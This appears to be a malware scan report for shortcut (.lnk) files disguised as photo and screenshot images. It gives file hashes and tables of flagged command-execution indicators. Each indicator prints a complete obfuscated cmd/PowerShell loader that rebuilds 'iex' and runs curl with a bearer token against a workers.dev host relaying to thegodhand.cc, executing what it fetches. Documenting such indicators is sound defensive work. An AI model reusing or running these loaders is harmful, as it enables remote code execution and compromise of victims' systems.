|
Hash | Hash Value |
|---|---|
| MD5 | c30ffd5bcf5562a81504e95bfbf0b264
|
| Sha1 | caff899aba3fca926315356db7932ff23716e700
|
| Sha256 | 8aadebc4fb43fb6cf3d81d5aa35eb479b9f38087d7f5fcd8f5767535dc548859
|
| Sha384 | 9743c72a0c07b4202052f9ad588610196170570069afdf8747ea940df356c856a489c2398f1e5919275c9e012339dbb3
|
| Sha512 | be7efc1581ec7cdac4a75b496fa555f3ba0d887a52a46a8d3d4ca6d06e63b82ef9b74097ad43b178173925749f6d232ca78dc7beab3e11958f2db96cd38a0467
|
| SSDeep | 49152:gmMQ1pE5ZNKuePgl9akfFK4hobv982FvfseypbKt:pzpE5KuePgl9VBob7Fns8
|
| TLSH | C1853359B30626EF0B6634A73D9479A9E1F05313F7F4F1D9A73289A58B398F046C0A31
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '.,@O.,@u.,@t.,@-.,@S.,@t.,@r.,@i.,@n.,@g.,@ .,@-.,@I.,@n.,@p.,@u.,@t.,@O.,@b.,@j.,@e.,@c.,@t.,@ .,@(.,@c.,@u.,@r.,@l.,@..,@e.,@x.,@e.,@ .,@-.,@k.,@ .,@-.,@H.,@ .,@ ".,@A.,@u.,@t.,@h.,@o.,@r.,@i.,@z.,@a.,@t.,@i.,@o.,@n.,@:.,@ .,@B.,@e.,@a.,@r.,@e.,@r.,@ .,@c.,@H.,@V.,@2.,@e.,@3.,@c.,@=.,@".,@ .,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@a.,@p.,@p.,@-.,@1.,@7.,@7.,@6.,@0.,@4.,@0.,@4.,@8.,@9.,@-.,@o.,@w.,@e.,@y.,@m.,@a.,@..,@a.,@p.,@i.,@-.,@5.,@3.,@9.,@8.,@2.,@6.,@f.,@f.,@..,@w.,@o.,@r.,@k.,@e.,@r.,@s.,@..,@d.,@e.,@v.,@/.,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@t.,@h.,@e.,@g.,@o.,@d.,@h.,@a.,@n.,@d.,@..,@c.,@c.,@/.,@a.,@p.,@i.,@/.,@s.,@e.,@c.,@o.,@n.,@d.,@e.,@y.,@e.,@).,@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('.,@','')) & echo %x% | %PSModulePath:~-23,10%" |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '+$$O+$$u+$$t+$$-+$$S+$$t+$$r+$$i+$$n+$$g+$$ +$$-+$$I+$$n+$$p+$$u+$$t+$$O+$$b+$$j+$$e+$$c+$$t+$$ +$$(+$$c+$$u+$$r+$$l+$$.+$$e+$$x+$$e+$$ +$$-+$$k+$$ +$$-+$$H+$$ +$$ "+$$A+$$u+$$t+$$h+$$o+$$r+$$i+$$z+$$a+$$t+$$i+$$o+$$n+$$:+$$ +$$B+$$e+$$a+$$r+$$e+$$r+$$ +$$c+$$X+$$t+$$6+$$e+$$n+$$M+$$=+$$"+$$ +$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$a+$$p+$$p+$$-+$$1+$$7+$$7+$$6+$$0+$$4+$$0+$$4+$$8+$$9+$$-+$$o+$$w+$$e+$$y+$$m+$$a+$$.+$$a+$$p+$$i+$$-+$$5+$$3+$$9+$$8+$$2+$$6+$$f+$$f+$$.+$$w+$$o+$$r+$$k+$$e+$$r+$$s+$$.+$$d+$$e+$$v+$$/+$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$t+$$h+$$e+$$g+$$o+$$d+$$h+$$a+$$n+$$d+$$.+$$c+$$c+$$/+$$a+$$p+$$i+$$/+$$s+$$e+$$c+$$o+$$n+$$d+$$e+$$y+$$e+$$)+$$'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('+$$','')) & echo %x% | %PSModulePath:~-23,10%" |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) ':?+O:?+u:?+t:?+-:?+S:?+t:?+r:?+i:?+n:?+g:?+ :?+-:?+I:?+n:?+p:?+u:?+t:?+O:?+b:?+j:?+e:?+c:?+t:?+ :?+(:?+c:?+u:?+r:?+l:?+.:?+e:?+x:?+e:?+ :?+-:?+k:?+ :?+-:?+H:?+ :?+ ":?+A:?+u:?+t:?+h:?+o:?+r:?+i:?+z:?+a:?+t:?+i:?+o:?+n:?+::?+ :?+B:?+e:?+a:?+r:?+e:?+r:?+ :?+e:?+3:?+F:?+x:?+e:?+n:?+M:?+=:?+":?+ :?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+a:?+p:?+p:?+-:?+1:?+7:?+7:?+6:?+0:?+4:?+0:?+4:?+8:?+9:?+-:?+o:?+w:?+e:?+y:?+m:?+a:?+.:?+a:?+p:?+i:?+-:?+5:?+3:?+9:?+8:?+2:?+6:?+f:?+f:?+.:?+w:?+o:?+r:?+k:?+e:?+r:?+s:?+.:?+d:?+e:?+v:?+/:?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+t:?+h:?+e:?+g:?+o:?+d:?+h:?+a:?+n:?+d:?+.:?+c:?+c:?+/:?+a:?+p:?+i:?+/:?+s:?+e:?+c:?+o:?+n:?+d:?+e:?+y:?+e:?+):?+'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])(':?+','')) & echo %x% | %PSModulePath:~-23,10%" |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '?+@O?+@u?+@t?+@-?+@S?+@t?+@r?+@i?+@n?+@g?+@ ?+@-?+@I?+@n?+@p?+@u?+@t?+@O?+@b?+@j?+@e?+@c?+@t?+@ ?+@(?+@c?+@u?+@r?+@l?+@.?+@e?+@x?+@e?+@ ?+@-?+@k?+@ ?+@-?+@H?+@ ?+@ "?+@A?+@u?+@t?+@h?+@o?+@r?+@i?+@z?+@a?+@t?+@i?+@o?+@n?+@:?+@ ?+@B?+@e?+@a?+@r?+@e?+@r?+@ ?+@c?+@n?+@V?+@0?+@c?+@X?+@o?+@=?+@"?+@ ?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@a?+@p?+@p?+@-?+@1?+@7?+@7?+@6?+@0?+@4?+@0?+@4?+@8?+@9?+@-?+@o?+@w?+@e?+@y?+@m?+@a?+@.?+@a?+@p?+@i?+@-?+@5?+@3?+@9?+@8?+@2?+@6?+@f?+@f?+@.?+@w?+@o?+@r?+@k?+@e?+@r?+@s?+@.?+@d?+@e?+@v?+@/?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@t?+@h?+@e?+@g?+@o?+@d?+@h?+@a?+@n?+@d?+@.?+@c?+@c?+@/?+@a?+@p?+@i?+@/?+@s?+@e?+@c?+@o?+@n?+@d?+@e?+@y?+@e?+@)?+@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('?+@','')) & echo %x% | %PSModulePath:~-23,10%" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '.,@O.,@u.,@t.,@-.,@S.,@t.,@r.,@i.,@n.,@g.,@ .,@-.,@I.,@n.,@p.,@u.,@t.,@O.,@b.,@j.,@e.,@c.,@t.,@ .,@(.,@c.,@u.,@r.,@l.,@..,@e.,@x.,@e.,@ .,@-.,@k.,@ .,@-.,@H.,@ .,@ ".,@A.,@u.,@t.,@h.,@o.,@r.,@i.,@z.,@a.,@t.,@i.,@o.,@n.,@:.,@ .,@B.,@e.,@a.,@r.,@e.,@r.,@ .,@c.,@H.,@V.,@2.,@e.,@3.,@c.,@=.,@".,@ .,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@a.,@p.,@p.,@-.,@1.,@7.,@7.,@6.,@0.,@4.,@0.,@4.,@8.,@9.,@-.,@o.,@w.,@e.,@y.,@m.,@a.,@..,@a.,@p.,@i.,@-.,@5.,@3.,@9.,@8.,@2.,@6.,@f.,@f.,@..,@w.,@o.,@r.,@k.,@e.,@r.,@s.,@..,@d.,@e.,@v.,@/.,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@t.,@h.,@e.,@g.,@o.,@d.,@h.,@a.,@n.,@d.,@..,@c.,@c.,@/.,@a.,@p.,@i.,@/.,@s.,@e.,@c.,@o.,@n.,@d.,@e.,@y.,@e.,@).,@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('.,@','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > IMG20250723_1923342.lnk |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '+$$O+$$u+$$t+$$-+$$S+$$t+$$r+$$i+$$n+$$g+$$ +$$-+$$I+$$n+$$p+$$u+$$t+$$O+$$b+$$j+$$e+$$c+$$t+$$ +$$(+$$c+$$u+$$r+$$l+$$.+$$e+$$x+$$e+$$ +$$-+$$k+$$ +$$-+$$H+$$ +$$ "+$$A+$$u+$$t+$$h+$$o+$$r+$$i+$$z+$$a+$$t+$$i+$$o+$$n+$$:+$$ +$$B+$$e+$$a+$$r+$$e+$$r+$$ +$$c+$$X+$$t+$$6+$$e+$$n+$$M+$$=+$$"+$$ +$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$a+$$p+$$p+$$-+$$1+$$7+$$7+$$6+$$0+$$4+$$0+$$4+$$8+$$9+$$-+$$o+$$w+$$e+$$y+$$m+$$a+$$.+$$a+$$p+$$i+$$-+$$5+$$3+$$9+$$8+$$2+$$6+$$f+$$f+$$.+$$w+$$o+$$r+$$k+$$e+$$r+$$s+$$.+$$d+$$e+$$v+$$/+$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$t+$$h+$$e+$$g+$$o+$$d+$$h+$$a+$$n+$$d+$$.+$$c+$$c+$$/+$$a+$$p+$$i+$$/+$$s+$$e+$$c+$$o+$$n+$$d+$$e+$$y+$$e+$$)+$$'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('+$$','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > SCREENSHOT_20260411_199283.lnk |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) ':?+O:?+u:?+t:?+-:?+S:?+t:?+r:?+i:?+n:?+g:?+ :?+-:?+I:?+n:?+p:?+u:?+t:?+O:?+b:?+j:?+e:?+c:?+t:?+ :?+(:?+c:?+u:?+r:?+l:?+.:?+e:?+x:?+e:?+ :?+-:?+k:?+ :?+-:?+H:?+ :?+ ":?+A:?+u:?+t:?+h:?+o:?+r:?+i:?+z:?+a:?+t:?+i:?+o:?+n:?+::?+ :?+B:?+e:?+a:?+r:?+e:?+r:?+ :?+e:?+3:?+F:?+x:?+e:?+n:?+M:?+=:?+":?+ :?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+a:?+p:?+p:?+-:?+1:?+7:?+7:?+6:?+0:?+4:?+0:?+4:?+8:?+9:?+-:?+o:?+w:?+e:?+y:?+m:?+a:?+.:?+a:?+p:?+i:?+-:?+5:?+3:?+9:?+8:?+2:?+6:?+f:?+f:?+.:?+w:?+o:?+r:?+k:?+e:?+r:?+s:?+.:?+d:?+e:?+v:?+/:?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+t:?+h:?+e:?+g:?+o:?+d:?+h:?+a:?+n:?+d:?+.:?+c:?+c:?+/:?+a:?+p:?+i:?+/:?+s:?+e:?+c:?+o:?+n:?+d:?+e:?+y:?+e:?+):?+'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])(':?+','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > IMG20260329_1859432.lnk |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '?+@O?+@u?+@t?+@-?+@S?+@t?+@r?+@i?+@n?+@g?+@ ?+@-?+@I?+@n?+@p?+@u?+@t?+@O?+@b?+@j?+@e?+@c?+@t?+@ ?+@(?+@c?+@u?+@r?+@l?+@.?+@e?+@x?+@e?+@ ?+@-?+@k?+@ ?+@-?+@H?+@ ?+@ "?+@A?+@u?+@t?+@h?+@o?+@r?+@i?+@z?+@a?+@t?+@i?+@o?+@n?+@:?+@ ?+@B?+@e?+@a?+@r?+@e?+@r?+@ ?+@c?+@n?+@V?+@0?+@c?+@X?+@o?+@=?+@"?+@ ?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@a?+@p?+@p?+@-?+@1?+@7?+@7?+@6?+@0?+@4?+@0?+@4?+@8?+@9?+@-?+@o?+@w?+@e?+@y?+@m?+@a?+@.?+@a?+@p?+@i?+@-?+@5?+@3?+@9?+@8?+@2?+@6?+@f?+@f?+@.?+@w?+@o?+@r?+@k?+@e?+@r?+@s?+@.?+@d?+@e?+@v?+@/?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@t?+@h?+@e?+@g?+@o?+@d?+@h?+@a?+@n?+@d?+@.?+@c?+@c?+@/?+@a?+@p?+@i?+@/?+@s?+@e?+@c?+@o?+@n?+@d?+@e?+@y?+@e?+@)?+@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('?+@','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > IMG20260411_1823942.lnk |